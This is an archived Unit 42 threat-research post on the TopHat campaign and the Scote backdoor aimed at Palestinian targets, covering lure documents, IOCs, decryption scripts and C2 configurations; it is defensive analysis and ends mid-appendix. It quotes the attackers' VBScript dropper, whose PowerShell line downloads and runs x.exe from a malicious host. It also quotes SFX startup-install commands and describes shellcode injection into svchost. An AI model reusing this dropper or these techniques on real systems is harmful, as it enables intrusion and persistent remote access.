{
	"id": "01bb29c7-2755-4ac2-8f5b-9b0bc686f699",
	"created_at": "2026-04-06T00:12:27.796051Z",
	"updated_at": "2026-04-10T03:19:56.877629Z",
	"deleted_at": null,
	"sha1_hash": "d865976c95c90673e0517ca8f4ebfb0c386e593b",
	"title": "The TopHat Campaign: Attacks Within The Middle East Region Using Popular Third-Party Services",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2414317,
	"plain_text": "The TopHat Campaign: Attacks Within The Middle East Region Using\r\nPopular Third-Party Services\r\nBy Josh Grunzweig\r\nPublished: 2018-01-26 · Archived: 2026-04-05 23:10:07 UTC\r\nSummary\r\nIn recent months, Palo Alto Networks Unit 42 observed a wave of attacks leveraging popular third-party services Google+,\r\nPastebin, and bit.ly. Attackers used Arabic language decoy documents related to current events within the Palestine\r\nTerritories as lures to entice victims to open and subsequently be infected by the malware. There is data indicating that these\r\nattacks are targeting individuals or organizations within the Palestinian Territories, which is detailed later.\r\nThe attacks themselves are deployed via four different means, two involving malicious RTF files, one involving self-extracting Windows executables, and the final using RAR archives.\r\nThe ultimate payload is a new malware family that we have dubbed “Scote” based on strings we found within the malware\r\nsamples. Scote provides backdoor access for an attacker and we have observed it collecting command and control (C2)\r\ninformation from Pastebin links as well as Google+ profiles. The bit.ly links obscured the C2 URLs so victims could not\r\nevaluate the legitimacy of the final site prior to clicking it. We are calling their recent activity the “TopHat” campaign.\r\nAdditionally, we tracked the apparent author testing their malware against numerous security products. Our tracking of this\r\ntesting enabled us to both note changes made over time as well as to observe other malware being submitted by the author.\r\nThis other malware submitted provided overlaps with the previously reported DustySky campaign. In addition to testing\r\nmalicious RTFs that deploy the Scote malware family, the same attacker was witnessed submitting files that appear to be\r\nnew variants of the DustySky Core malware discussed in their report.\r\nMalware Delivery Techniques\r\nThe attacks we found within the TopHat campaign began in early September 2017. In a few instances, original filenames of\r\nthe identified samples were written in Arabic. Specifically, we found the following names during this investigation:\r\n \r\nOriginal Filename Translation\r\nالسلطة بحل يبدا الرئيس.rar The president begins dissolving power.rar\r\nالسلطة بحل يبدا الرئيس.scr The president begins dissolving power.scr\r\nاليوم اجتماع محضر.doc Minutes of today's meeting.doc\r\n \r\nWe observed a series of techniques used to deploy the Scote malware family. To date, at a high level, we have observed the\r\nfollowing four techniques, each of which we delve into in this blog:\r\nFigure 1 Malware delivery techniques\r\nhttps://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/\r\nPage 1 of 14\n\nTechnique #1 – RTFs Leveraging Bit.ly\r\nThe first technique encountered included the use of malicious RTFs that made a HTTP request to the below URL which then\r\nredirected to the below malicious site (note the intentional typo of “storage”):\r\n \r\nURL Redirect\r\nhttp://bit[.]ly/2y3XL3P http://storgemydata[.]website/v.dat\r\n \r\nThis ‘v.dat’ file was in turn a PE32 executable file that has the following SHA256 hash:\r\nSHA256 862a9836450a0988bc0f5bd5042392d12d983197f40654c44617a03ff5f2e1d5\r\n \r\nLooking at the publicly available statistics for the bit[.]ly redirect, we see the majority of activity taking place in late\r\nOctober of this year. Additionally, we see the majority of the downloads originating from both the Palestinian Territories as\r\nwell as the United Arab Emirates. This provides clues as to who the victims are or where attackers may originate from.\r\n \r\nFigure 2 Statistics surrounding malicious redirect\r\n \r\nTechnique #2 – Don’t Kill My Cat Attacks\r\nThe second technique uses an interesting tactic that Unit 42 has not seen before. Specifically, it makes use of an attack\r\ndiscussed in July of this year called Don’t Kill My Cat or DKMC. DKMC can enable an attacker to load a legitimate bitmap\r\n(BMP) file that contains shellcode within it. The DKMC tool and more information about this tactic may be found here.\r\nThis specific attack begins with a malicious executable file that downloads a legitimate BMP file that looks like the\r\nfollowing:\r\nhttps://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/\r\nPage 2 of 14\n\nFigure 3 Malicious BMP image retrieved by downloader\r\nIt should be noted that this is the same image used in the DKMC presentation. It would appear that the attackers simply used\r\nthe default settings of this particular program.\r\nThis BMP file is loaded as shellcode. The first six bytes are read as the following instructions:\r\n1\r\n2\r\n3\r\nseg000:00000000                 inc     edx\r\nseg000:00000001                 dec     ebp\r\nseg000:00000002                 jmp     loc_34D8B\r\nCode execution is then redirected to embedded shellcode.\r\nThe underlying shellcode is decrypted at runtime using a 4-byte XOR key of 0x3C0922F0. The shellcode eventually loads\r\nan embedded UPX-packed executable and redirects execution to this file. This file is an instance of the Scote malware\r\nfamily. The size of the payload and the fact that it is embedded within the BMP file explains the large amount of distortion\r\nwitnessed in the image above. In other words, the distortion witnessed is actually the shellcode and the embedded Scote\r\nmalware. As this data is converted within a BMP image, we’re left with what essentially looks like random pixels.\r\nTechnique #3 – RTFs Exploiting CVE-2017-0199.\r\nThis technique begins with malicious RTF files that make use of CVE-2017-0199 a Microsoft Office/WordPad remote code\r\nexecution (RCE) vulnerability patched by Microsoft in September 2017. When opened, the following lure is displayed to the\r\nvictim (translation on the right provided by Google Translate):\r\nFigure 4 Lure used by malicious RTFs\r\nThis lure is related to an event reported in late August where President Mahmoud Abbas announced plans to convert a\r\nplanned presidential palace into a national library. This is consistent with the timeline of the attacks we witnessed, as the\r\nevent took place roughly a week before we observed these malware samples.\r\nThese RTFs will also download a file from the following location:\r\nstorgemydata[.]website/update-online/office-update.rtf\r\nNote that this is the same domain witnessed in the redirect used in technique #1. While the downloaded file has an RTF\r\nextension, it is in fact a VBScript with the following contents:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n\u003cscript language=\"VBScript\"\u003e\r\nwindow.moveTo -4000, -4000\r\n  Set vFwhEtGt = CreateObject(\"Wscript.Shell\")\r\n  Set lfTi = CreateObject(\"Scripting.FileSystemObject\")\r\n  If 1=1 Then\r\n    vFwhEtGt.Run (\"PowerShell.exe -WindowStyle Hidden $d=$env:userprofile+'\\\\start\r\nMenu\\\\Programs\\\\Startup\\\\\\12330718701ac441736a55e3ee3cx996.exe';(New-Object\r\nSystem.Net.WebClient).DownloadFile('http://storgemydata[.]website/x.exe',$d);Start-Process $d;\"),0\r\nEnd If\r\n  window.close()\r\n\u003c/script\u003e\r\nhttps://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/\r\nPage 3 of 14\n\nThis VBScript script executes a PowerShell command that will download and execute a file from the following location:\r\nhttp://storgemydata[.]website/x.exe\r\nThis final ‘x.exe’ executable file is an instance of the Scote malware family.\r\nTechnique #4 – Self-extracting Executables\r\nThe last technique makes use of self-extracting executable files to both load a decoy document and spawn an instance of\r\nScote. When the malware is run it will drop a file with an original filename of ‘abbas.rtf’, which contains the following\r\ncontents:\r\nFigure 5 TopHat decoy document with rough translation\r\nAdditionally, an instance of Scote is loaded on the victim machine.\r\nThe decoy document used discusses the potential dissolving of the Palestinian Authority (PA) by the President Mahmoud\r\nAbbas. This particular event was reported on August 23, 2017, just before Trump administration officials were set to visit\r\nRamallah.\r\nLater in this blog, we will see the attackers leveraging this Donald Trump connection even more.\r\nWe originally witnessed these specific RTFs on September 6th, 2017, just two weeks after this event.\r\nBased on the observed statistics from the malicious redirect found in technique #1, as well as the content of this decoy\r\ndocument, we can infer that at least some of the targeted victims may very well be located in the Palestinian Territories.\r\nAnalysis of the Scote Malware\r\nThe Scote malware family employs a series of techniques and tricks when it is originally loaded onto a victim machine.\r\nHowever, underneath the various layers of obfuscation lies a fairly straightforward malware family that abuses legitimate\r\nthird-party online services to host its C2 information.\r\nWhen Scote originally is run, it will decode embedded configuration information. This embedded configuration information\r\ncontains URLs to third party online services, such as Pastebin postings or Google+ accounts. Scote will use this information\r\nto attempt to retrieve data from these URLS and parse it, such as in the following example:\r\nFigure 6 Google+ profile used by Scote malware\r\nhttps://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/\r\nPage 4 of 14\n\nIt should be noted that a total of three Google+ profiles have been observed and all of these profiles contained the name\r\n‘Donald Trump’. This is interesting given the topics we saw being used to deliver the Scote malware family within the\r\nTopHat campaign, many of which also referred to the President of the Palestinian Territories.\r\nAfter C2 information is retrieved by Scote, it will communicate with these servers and can accept commands that perform\r\nthe following actions:\r\nKill the Scote malware\r\nRun ‘ipconfig’ on the victim and return results\r\nRun ‘cmd.exe /C systeminfo’ and return results\r\nLoad a DLL that is downloaded from a C2\r\nFor more information about the Scote malware family, please refer to the Appendix.\r\nIdentified Malware Testing Against Security Solutions\r\nWhen looking at the malicious RTF documents in technique #4 that exploit CVE-2017-0199 we found that all of the files we\r\nencountered were submitted within close succession of each other to an online service that tests them against multiple\r\nsecurity products. Additionally, the original filenames of these files implied that an attacker may have been testing their\r\nmalware against one or more security products.\r\nSHA256 Filename Date\r\ncb6cf34853351ba62d4dd2c609d6a41c618881670d5652ffa7ddf5496e4693f0 test1.rtf\r\n2017-09-06 15:00:08\r\nUTC\r\n8a158271521861e6362ee39710ac833c937ecf2d5cbf4065cb44f3232224cf64 xx.rtf\r\n2017-09-06 15:00:53\r\nUTC\r\nd302f794d45c2a6eaaf58ade70a9044e28bc9ec43c9f7a1088a606684b1364b5 xx2.rtf\r\n2017-09-06 15:01:49\r\nUTC\r\n1cd49a82243eacdd08eee6727375c1ab83e8ecca0e5ab7954c681038e8dd65a1 xx2.rtf\r\n2017-09-06 15:05:30\r\nUTC\r\nd409d26cffe6ce5298956bd65fd604edf9cfa14bc3373a7bdeb47091729f09e9 xx2.rtf\r\n2017-09-06 15:08:32\r\nUTC\r\naa18b8175f68e8eefa12cd2033368bc1b73ff7caf05b405f6ff1e09ef812803c xx2.rtf\r\n2017-09-06 15:18:14\r\nUTC\r\n \r\nAs we can see by the timestamps shown above, the files were submitted anywhere from one to ten minutes apart from each\r\nother. Looking closer at these files we can see what changed between iterations.\r\nhttps://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/\r\nPage 5 of 14\n\nFigure 7 Modifications made to RTFs by attacker\r\nAs it so happens, the first RTF file this attacker attempted to test had very few detections. However, this was due to the fact\r\nthat the attempts at commenting out the backslashes caused this file to not open at all within Microsoft Word. When you\r\nattempt to open this file, Word will simply render the content as it would a normal text file.\r\nIt appeared that the attacker realized this, as he or she quickly corrected this, and proceeded to make very minor\r\nmodifications to try and evade security products. However, none of the modifications were terribly effective: all of these\r\nsamples were found to have a high rate of detection.\r\nAs we can see in Figure 7, the attacker made multiple very small modifications between each iteration, specifically around\r\nthe ‘\\object\\objlink\\objupdate’ string. This particular control allows the malicious content to be loaded by the RTF, as\r\noutlined in an analysis by MDSec. As such, the attacker likely felt this was what resulted in the RTF being detected as\r\nmalicious, and attempted to obfuscated it.\r\nOverlap with the DustySky Campaign\r\nBesides being able to witness the attacker testing his or her malware, we noticed something interesting when we were\r\nlooking at the individual who submitted these files. About a month and a half after these files were submitted, the same\r\nindividual submitted the following three samples that we attribute to the DustySky campaign:\r\n202d1d51254eb13c64d143c387a87c5e7ce97ba3dcfd12dd202a640439a9ea3b\r\nd18e09debde4748163efa25817b197f3ff0414d2255f401b625067669e8e571e\r\n3e4d0ffdde0b5db2a0a526730ff63908cefc9634f07ec027c478c123912554bb\r\nDustySky is a campaign published by ClearSky in January 2016 that discusses a politically motivated group that primarily\r\ntargets organizations within the Middle East. The group has remained active since they were originally reported on,\r\nincluding a campaign identified by Unit 42 earlier this year. These files appear to be new variants of the DustySky Core\r\nmalware discussed in the report and they communicate with the following domains over HTTPS:\r\nfulltext.yourtrap[.]com\r\nchecktest.www1[.]biz\r\nThe malware is dropped via a self-extracting executable, which contains an empty decoy document with the following\r\nname:\r\ndocx.انباء عن احتجاز الرٔييس عباس في السعودية واعالن دحالن رٔييسا لفلسطني\r\nThis can roughly be translated to the following:\r\nNews of the detention of President Abbas in Saudi Arabia and Dahlan's declaration as President of Palestine.docx\r\nAs we can see, the name of this decoy document is consistent with the lures witnessed in the TopHat campaign.\r\nConclusion\r\nAttackers often are found to leverage current events to accomplish their goal. In the TopHat campaign, we have observed yet\r\nanother instance where a threat actor looks to be using political events to target individuals or organizations within the\r\nPalestine region. This campaign leveraged multiple methods to deploy a previously unseen malware family, including some\r\nrelatively new tactics in the case of using a legitimate BMP file to load malicious shellcode.\r\nThe new malware family, which we have dubbed Scote, employs various tricks and tactics to evade detection, but provides\r\nrelatively little functionality to the attackers once deployed. This may well be due to the fact it is still under active\r\ndevelopment. Scote uses some interesting methods when retrieving C2 information, including the use of Pastebin and\r\nGoogle+ accounts, as well as using bit.ly links to obscure the C2 URLs so victims could not evaluate the legitimacy of the\r\nfinal site prior to clicking it.\r\nThe TopHat campaign was found to have some overlaps discovered with the previously reported DustySky campaign when\r\nthe attacker was identified to be submitting their files for testing purposes. Unit 42 will continue to track and monitor this\r\nthreat and will report on any developments that occur.\r\nPalo Alto Networks customers are protected by this threat in the following ways:\r\nThe Scote malware family and the TopHat campaign have been tagged within AutoFocus for continued tracking\r\nDustySky is tagged within AutoFocus for ongoing tracking\r\nAll malicious domains discovered within this campaign have been appropriately flagged as malware\r\nAll samples are marked malicious within WildFire\r\nTraps identifies and blocks the exploits used by the RTF files\r\nAdditionally, Google, Pastebin, and bit.ly have been notified of the malicious content being hosted on their services.\r\nAppendix\r\nhttps://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/\r\nPage 6 of 14\n\nIndicators of Compromise\r\nSHA256 Hashes\r\nd3ead67228b3d7968ac767648b46a8e906affa0ebb5cc69f7acbed475a97204c\r\n03e2b932c013252fa2eb5e35390f9e21d0ff87e5b1c01683ebce0e8ce9b8d6df\r\n4df9488fbdfaf5d05fda65175a6b6e5331c58c967adbe972aa46c64b4fd0b1bb\r\n0dde9940f7896c2e4fb881dd185c3c3db280a9fd2ac2cb81988f43f5b0f6fcf7\r\n613da5f745c281acbffa4375e96394f8c912f58f92afe347e8a1f10fad3489bb\r\nd0f2d2d7d82c91fe64a64552e0e6200a096230fb6a64a1307928ae33ab2a5bf8\r\n7b6347093b27174e27228c2fde7d39e02d57315b354461aaf1dee3f0800fdfc3\r\nbdc633fe3145d87036ad759be855771d5bb3ca592cecca9ef7f41454d7cf9f05\r\ned9c62f77055a2498aec681b5653240be534595b97a9d11e92371639b0ca9a48\r\n7a1fa34ca804492415579c3ed4f505a7f09fcd7bc834590cff86e2ce77c4fc73\r\n862a9836450a0988bc0f5bd5042392d12d983197f40654c44617a03ff5f2e1d5\r\n3540c2f0765773fa0a822fcf5fed5ed2a363ad11291a66ab1b488c9a4aa857f9\r\nddc13c8d3d55562df873d4cf17181164922cb71d0c94edeb8fa143033c1214e0\r\nd4cb6b76dd352c928ca7184f583d14d800c090ba650dd26d8fa4febe901d1205\r\n5c0b253966befd57f4d22548f01116ffa367d027f162514c1b043a747bead596\r\n1f9bca1d5ce5d14d478d32f105b3ab5d15e1c520bde5dfca22324262e84d4eaf\r\nc9ba9e11a19120b58af1f6ccf3beb25744580592c680718a6fc205d662f2a20e\r\naa18b8175f68e8eefa12cd2033368bc1b73ff7caf05b405f6ff1e09ef812803c\r\nd409d26cffe6ce5298956bd65fd604edf9cfa14bc3373a7bdeb47091729f09e9\r\nd302f794d45c2a6eaaf58ade70a9044e28bc9ec43c9f7a1088a606684b1364b5\r\n1cd49a82243eacdd08eee6727375c1ab83e8ecca0e5ab7954c681038e8dd65a1\r\n8a158271521861e6362ee39710ac833c937ecf2d5cbf4065cb44f3232224cf64\r\n3627ed71588c7b55b35592c3b277910041f3d5ff917de721c53684ee18fcda40\r\n109996d28700fa0e8594d6ecca422418fa43e1b7cf5f9f4442a69264bf5fcea4\r\nc2815c72c9ea70db073775269ef04b1d061e93580f0f5fd3f3de25601641576a\r\nDomains\r\nstorgemydata[.]website\r\n  Scote Technical Analysis\r\nFor the technical analysis, we used the following sample:\r\nSHA256 3540c2f0765773fa0a822fcf5fed5ed2a363ad11291a66ab1b488c9a4aa857f9\r\n \r\nThis particular sample begins as a self-extracting executable. When run, it will drop a ‘e.exe’ sample and execute the\r\nfollowing SFX script commands:\r\n1\r\n2\r\n3\r\n4\r\n5\r\nPath=%userprofile%\\start menu\\programs\\startup\\\r\nSetup=e.exe\r\nSilent=1\r\nOverwrite=1\r\nUpdate=U\r\n \r\nFor those unfamiliar with SFX commands, the series of commands above is silently deploying e.exe to the startup path. It\r\nwill overwrite any instances where e.exe already exists in this path.\r\nThe ‘e.exe’ file is compiled in Delphi and has the following SHA256 hash:\r\nSHA256 9580d15a06cd59c01c59bca81fa0ca8229f410b264a38538453f7d97bfb315e7\r\n \r\nWhen run, ‘e.exe’ will periodically decrypt strings at runtime using a simple single-byte XOR routine. While the routine\r\nallows for different bytes to be used, the author chose to use a key of 0xFF in every observed instance.\r\nThe malware proceeds to get the address of the NtDelayExecution function from ntdll.dll. This function is used by Sleep to\r\ncause a delay in program execution. After this function address has been resolved, it will overwrite the first five bytes to jmp\r\nhttps://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/\r\nPage 7 of 14\n\nto a malicious function, as seen below:\r\nFigure 8 Modifications to NtDelayExeuction\r\n \r\nThe malware proceeds to make a call to Sleep with an argument of 1, thus redirecting execution to this malicious function.\r\nThis is likely an attempt at thwarting anti-virus and security solutions, however, has the adverse effect of preventing the\r\nmalware from making subsequent calls to Sleep.\r\nThis malicious function continues to decode more strings using the single-byte XOR technique. Additionally, it will copy the\r\nfollowing functions out of ntdll.dll for later use:\r\nZwCreateUserProcess\r\nZwAllocateVirtualMemory\r\nZwWriteVirtualMemory\r\nZwGetContextThread\r\nZwSetContextThread\r\nZwResumeThread\r\nA large blob of encrypted data is decrypted using a modified version of RC4. The following Python code may be used to\r\ndecrypt this data. The key has consistently been observed to be “qlNwuFVA9K8HpGNY6x0I”.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\nimport base64\r\nimport binascii\r\nimport hexdump\r\nimport sys\r\ndef rc4_crypt(data, key):\r\n  S = range(256)\r\n  j = 0\r\n  out = []\r\n  for i in range(256):\r\n    j = (j + S[i] + ord( key[i % len(key)] )) % 256\r\n    S[i] , S[j] = S[j] , S[i]\r\n  i = 0\r\n  for char in data:\r\n    j = (S[i % 256] + j) % 256\r\n    t = S[i%256]\r\n    S[i%256] = S[j]\r\n    S[j] = t\r\n    out.append(chr(ord(char) ^ S[(S[i%256] + S[j]) % 256]))\r\n    i += 1\r\n  return ''.join(out)\r\nfile = sys.argv[1]\r\nf = open(file, 'rb')\r\nhttps://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/\r\nPage 8 of 14\n\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\nfd = f.read()\r\nf.close()\r\noutput = rc4_crypt(fd, \"qlNwuFVA9K8HpGNY6x0I\")\r\nf = open(\"decrypted_data.bin\",'wb')\r\nf.write(output)\r\nf.close()\r\n \r\nThis decrypted code is then copied to a newly allocated block of memory before execution flow is redirected to it. When this\r\nnewly decrypted code is called, it is provided with a string argument containing the path to svchost.exe.\r\nThis new code is shellcode that will eventually decrypt an executable file and inject it into a newly spawned svchost.exe\r\nprocess.\r\nThe shellcode in question makes certain decisions by the author that demonstrates a lack of sophistication. For example, it\r\nwill load a series of libraries and functions using a common ROR13 technique. This technique begins with the attacker\r\ntaking a string of a library or function, such as ‘CreateProcessA’, and performing a binary ROR13 against it. In this example,\r\nthe attacker has a result of a DWORD of 0x16B3FE72. This DWORD is then typically hardcoded within the shellcode. The\r\nmalicious code then iterates through the functions of the necessary library and applies the same ROR13 technique against\r\neach function until it finds a match.\r\nThis shellcode uses the same approach, however, instead of providing the hardcoded DWORDs, it instead provides the\r\nclear-text library and function names, which then have the ROR13 applied. The resulting DWORD is then used.\r\nUnfortunately, this completely cancels out any obfuscation that might have originally been present.\r\nAfter the various libraries and functions are loaded, the shellcode decodes an embedded blob of data using a multi-byte\r\nXOR operation. The original key for this operation appears to have been ‘Houdini’, however, due to a likely mistake by the\r\nauthor, after the first iteration, a key of ‘oudini\\x00’ is used instead.\r\nThe following example Python code decodes this data found within the shellcode:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\nimport sys\r\nfrom itertools import cycle, izip\r\ndef xor(message, key):\r\n  return ''.join(chr(ord(c)^ord(k)) for c,k in izip(message, cycle(key)))\r\ndef decode(data, size):\r\n  out = \"\"\r\n  key = \"oudini\\x00\"\r\n  b1 = xor(data[0], \"H\")\r\n  b2 = xor(data[1:size], key)\r\n  b = b1 + b2\r\n  for bite in b:\r\n    out += chr((ord(bite) + 128) \u0026 0xff)\r\n  return out\r\nfile = sys.argv[1]\r\nf = open(file, 'rb')\r\nfd = f.read()\r\nf.close()\r\nsize = 54272\r\noutput = decode(fd, size)\r\nf1 = \"embeddedShellcode.bin\"\r\nfh = open(f1, 'wb')\r\nhttps://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/\r\nPage 9 of 14\n\n22\r\n23\r\nfh.write(output)\r\nfh.close()\r\n \r\nThis decoded blob is a Microsoft Windows executable that contains the Scote payload. After this blob is decoded, a new\r\ninstance of svchost.exe is spawned in a suspended state. The Scote payload is injected into this process prior to resuming it.\r\nScote begins by loading and decoding an embedded resource string. It is decoded first using base64 with a customized\r\nalphabet. The result is then base64-decoded using the traditional alphabet. The following alphabet is used for the first phase\r\nof decoding:\r\n0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz+/\r\nOnce decoded, we’re provided with the following configuration (newlines and spacing added for presentation):\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n[config]\r\n  [connection]\r\n    [param]http://pastebin[.]com/raw/2cLsuXj6[/param]\r\n    [param]http://pastebin[.]com/raw/trZZJTGA[/param]\r\n  [/connection]\r\n  [install_name]e3HGAiPJ[/install_name]\r\n  [nick_name]4c1h7vLX[/nick_name]\r\n  [install_folder]noinstall[/install_folder]\r\n  [reg_startup]false[/reg_startup]\r\n  [folder_startup]false[/folder_startup]\r\n  [task_startup]false[/task_startup]\r\n  [injection]true[/injection]\r\n  [injection_process]svchost[/injection_process]\r\n \r\nThe configuration is parsed to determine if there are any connection ‘param’ parameters provided. In the event that there are,\r\nScote will attempt to download the contents of these URLs via a simple GET request.\r\nThese pastebin URLs contained the following information, IPs have been defanged:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\nscout{\r\n5.175.214[.]9:22\r\n5.175.214[.]9:23\r\n5.175.214[.]9:25\r\n5.175.214[.]9:53\r\n5.175.214[.]9:6000\r\n5.175.214[.]9:80\r\n}\r\nelite{\r\n5.175.214[.]9:5000\r\n5.175.214[.]9:443\r\n5.175.214[.]9:1434\r\n5.175.214[.]9:110\r\nhttps://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/\r\nPage 10 of 14\n\n14\r\n15\r\n16\r\n17\r\n5.175.214[.]9:2716\r\n5.175.214[.]9:8080\r\n}\r\n{x=c2NvdXR7DQo1LjE3NS4yMTQuOToyMg0KNS4xNzUuMjE0Ljk6MjMNCn0NCmVsaXRlew0KNS4xNzUuMjE0Ljk6NTAwMA0KNS4xN\r\n \r\nIn addition to Pastebin, some samples were found connecting to the following three Google+ profiles:\r\nhttps://plus.google[.]com/104518099222750189969\r\nhttps://plus.google[.]com/110228699051788231047\r\nhttps://plus.google[.]com/106456556287604120942\r\nScote takes the response from these requests and parses data within ‘scout{}’. Other Scote versions attempted to identify\r\ndata contained within ‘{x=’ and ‘}’. This data is decoded using the traditional Base64 algorithm. The results are similar to\r\nthe following (IPs have been defanged):\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\nscout{\r\n5.175.214[.]9:22\r\n5.175.214[.]9:23\r\n}\r\nelite{\r\n5.175.214[.]9:5000\r\n5.175.214[.]9:443\r\n}\r\n \r\nThis information is used for subsequent communication and these values represent the Scote malware’s C2.\r\nWhile there are a number of other configuration parameters within Scote, the connection params and the nick_name appear\r\nto be the only ones used. It’s possible that Scote is still actively being developed and the author has yet to make use of the\r\nadditional parameters provided within the configuration. A full list of identified Scote configurations may be found within\r\nthe ‘Scote Configurations’ appendix.\r\nScote checks the current running process against the following list to ensure it is running within one of them:\r\nsvchost.exe\r\nexplorer.exe\r\nchrome.exe\r\nfirefox.exe\r\niexplorer.exe\r\nopera.exe\r\nScote makes an ASM call to CPUID with an argument of 1 to query the victim’s processor information and features. This\r\ninformation is used to generate a unique 8-character hash for that victim.\r\nScote then connects to the previously retrieved C2 servers and sends the following information via TCP:\r\ncommand=scote_connection|hwid=[8 character hash]\r\nIn the example above, [8 character hash] is replaced with the victim’s unique hash. Scote continues to submit the following\r\ncommand periodically and will parse the response:\r\ncommand=scote_ping\r\nScote accepts the following five responses:\r\nCommand Description\r\nscote_pong No action taken by Scote\r\nscote_drop Kill the Scote malware\r\nscote_info_ipconfig Return the results of running ‘ipconfig’\r\nscote_info_systeminfo Return the results of running ‘cmd.exe /C systeminfo’\r\nhttps://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/\r\nPage 11 of 14\n\nscote_upgrade Accept a DLL from the remote C2 and load it.\r\n \r\nWhen Scote returns information in the following format:\r\ncommand=[command]|buffer=[data]\r\nIn the example above, [command] is replaced with the command received by the remote C2 server, and [data] is replaced\r\nwith data that has been encoded using both traditional base64 as well as base64 with the nonstandard alphabet.\r\nScote Configurations\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n4df9488fbdfaf5d05fda65175a6b6e5331c58c967adbe972aa46c64b4fd0b1bb\r\n[config]\r\n  [connection]\r\n    [param]https://plus.google[.]com/104518099222750189969[/param]\r\n    [param]https://plus.google[.]com/110228699051788231047[/param]\r\n    [param]https://plus.google[.]com/106456556287604120942[/param]\r\n  [/connection]\r\n  [install_name]Kh237t0P[/install_name]\r\n  [nick_name]k1et333d[/nick_name]\r\n  [install_folder]noinstall[/install_folder]\r\n  [reg_startup]false[/reg_startup]\r\n  [folder_startup]false[/folder_startup]\r\n  [task_startup]false[/task_startup]\r\n  [injection]true[/injection]\r\n  [injection_process]svchost[/injection_process]\r\ned9c62f77055a2498aec681b5653240be534595b97a9d11e92371639b0ca9a48\r\n[config]\r\n  [connection]\r\n    [param]https://plus.google[.]com/104518099222750189969[/param]\r\n    [param]https://plus.google[.]com/110228699051788231047[/param]\r\n    [param]https://plus.google[.]com/106456556287604120942[/param]\r\n  [/connection]\r\n  [install_name]Q2xm5ziY[/install_name]\r\n  [nick_name]hq5GyQ1D[/nick_name]\r\n  [install_folder]noinstall[/install_folder]\r\n  [reg_startup]false[/reg_startup]\r\n  [folder_startup]false[/folder_startup\r\n  [task_startup]false[/task_startup]\r\n  [injection]false[/injection]\r\n613da5f745c281acbffa4375e96394f8c912f58f92afe347e8a1f10fad3489bb\r\n[config]\r\n  [connection]\r\n    [param]http://pastebin[.]com/raw/2cLsuXj6[/param]\r\nhttps://unit42.paloaltonetworks.com/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/\r\nPage 12 of 14\n\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\n60\r\n61\r\n62\r\n63\r\n64\r\n65\r\n66\r\n67\r\n68\r\n69\r\n70\r\n71\r\n72\r\n    [param]http://pastebin[.]com/raw/trZZJTGA[/param]\r\n  [/connection]\r\n  [install_name]e3HGAiPJ[/install_name]\r\n  [nick_name]4c1h7vLX[/nick_name]\r\n  [install_folder]noinstall[/install_folder]\r\n  [reg_startup]false[/reg_startup]\r\n  [folder_startup]false[/folder_startup]\r\n  [task_startup]false[/task_startup]\r\n  [injection]true[/injection]\r\n  [injection_process]svchost[/injection_process]\r\n03e2b932c013252fa2eb5e35390f9e21d0ff87e5b1c01683ebce0e8ce9b8d6df\r\n[config]\r\n  [connection]\r\n    [param]http://pastebin[.]com/raw/2cLsuXj6[/param]\r\n    [param]http://pastebin[.]com/raw/trZZJTGA[/param]\r\n  [/connection]\r\n  [install_name]i0c9488I[/install_name]\r\n  [nick_name]7WDyDSog[/nick_name]\r\n  [install_folder]noinstall[/install_folder]\r\n  [reg_startup]false[/reg_startup]\r\n  [folder_startup]false[/folder_startup]\r\n  [task_startup]false[/task_startup]\r\n  [injection]true[/injection]\r\n  [injection_process]svchost[/injection_process]\r\n0dde9940f7896c2e4fb881dd185c3c3db280a9fd2ac2cb81988f43f5b0f6fcf7\r\n[config]\r\n  [connection]\r\n    [param]http://pastebin[.]com/raw/2cLsuXj6[/param]\r\n    